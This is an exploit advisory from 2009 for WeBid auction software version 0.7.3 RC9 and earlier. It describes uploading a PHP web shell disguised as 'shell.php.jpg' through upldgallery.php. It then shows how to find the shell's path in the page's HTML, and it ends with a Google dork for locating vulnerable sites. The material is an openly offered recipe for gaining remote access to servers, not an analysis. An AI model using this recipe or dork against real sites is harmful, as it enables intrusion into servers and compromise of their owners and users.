webid073-upload.txt
Posted on 26 March 2009
----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote --------------------------------------------------------------------------- Application : WeBid version : <= 0.7.3 RC9 Vendor : http://sourceforge.net/projects/simpleauction -------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~ Anyone can upload shell php with extension eg: shell.php.jpg. Poc/Exploit: ~~~~ http://www.example.com/[path]/upldgallery.php Then after upload shell right click to the pages to find your shell path ####################################### eg: </script> </head> <body bgcolor="#FFFFFF"> <div class="container"> <img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="float: left; margin-right: 10px;" id="thumbnail" alt="Create Thumbnail" /> <div style="float:left; position:relative; overflow:hidden; border:#000000 double; width:0; height:0;"> <img src="uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg" style="position: relative;" alt="Thumbnail Preview" /> </div> ####################################### Shell address above is : http://www.example.com/[path]/uploaded/211fa0e52f7c85cb5cc652f4864e4de9/shell.php.jpg -------------------------------------------------------------------------- Dork: ~ Google : Powered by WeBid © 2008, 2009 Webid
